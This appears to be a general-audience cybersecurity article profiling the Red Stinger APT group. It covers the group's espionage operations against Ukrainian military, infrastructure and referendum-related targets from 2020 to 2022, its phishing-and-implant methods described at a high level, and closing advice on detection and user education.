The digital world is continuously evolving, and with it, the threats that lurk within. One such threat is an Advanced Persistent Threat (APT) group known as “Red Stinger.” The group has gained notoriety for its stealthy and targeted attacks since 2020, primarily across Eastern Europe. The group’s operations are characterized by a high degree of sophistication and persistence, making them a significant concern for cybersecurity professionals.
The Red Stinger APT emerged in 2020, carrying out espionage operations in Eastern Europe, notably in Ukraine. Researchers from Malwarebytes and Kaspersky have linked the group to five major operations conducted from 2020 to 2022. The group targeted military, transportation, and critical infrastructure entities, as well as individuals involved in the September East Ukraine referendums. The group’s operations have been notably aggressive, and their persistence underscores the high probability of state funding.
The operations conducted by Red Stinger were named “Operation Four” and “Operation Five.” The former targeted a member of Ukraine’s military who works on critical infrastructure, exfiltrating screenshots, documents, and even recording audio from victims’ microphones. Operation Five targeted multiple election officials running Russian referendums in disputed cities in Ukraine, demonstrating the group’s interest in political processes.
The Red Stinger APT has been characterized by the use of innovative and sophisticated cyberattacks. The group’s tools and techniques, while not overly complex, are effective. It begins its campaigns with phishing attacks to distribute malicious links that lead to compromised ZIP files and documents, and special Windows linking files. Once these are deployed, the group uses basic scripts to act as a backdoor and a loader for malware.
One of the significant tools associated with Red Stinger is the DBoxShell (aka PowerMagic) implant, which was dropped on compromised systems via malicious installer files. The implant was downloaded by means of a Windows shortcut file contained within a ZIP archive. The group has demonstrated an evolution in its attack sequences, with minor variations in the MSI file names observed in subsequent waves of attacks in April and September 2021.
In February 2022, coinciding with Russia’s military invasion of Ukraine, a fourth set of attacks was executed by Red Stinger. During this wave of attacks, two victims located in central Ukraine – a military target and an officer working in critical infrastructure – were compromised. The group exfiltrated screenshots, microphone recordings, and office documents after a period of reconnaissance, with one of the victims also having their keystrokes logged and uploaded. The last known activity associated with Red Stinger took place in September 2022, as documented by Kaspersky.
The Red Stinger APT remains a threat in the cyber landscape. The group continues to refine its methods, creating new tools to evade detection and maintain its persistent and aggressive approach to cyber espionage. Its primary goal seems to be surveillance and data gathering, with a clear focus on specific entities aligned with Russia and Ukraine.
In the face of such threats, cybersecurity professionals must remain vigilant. As the Malwarebytes researchers suggested, organizations should deploy detections for Red Stinger operations and search their own telemetry for additional indications of what the hackers have done in the past. Regularly updating security systems and educating users about the risks of phishing attacks can also help mitigate the risk of compromise by groups like Red Stinger.
In conclusion, Red Stinger remains a mysterious and formidable player in the world of cyber threats. Its operations serve as a stark reminder of the constant evolution of cyber threats and the need for continuous vigilance and robust cybersecurity measures.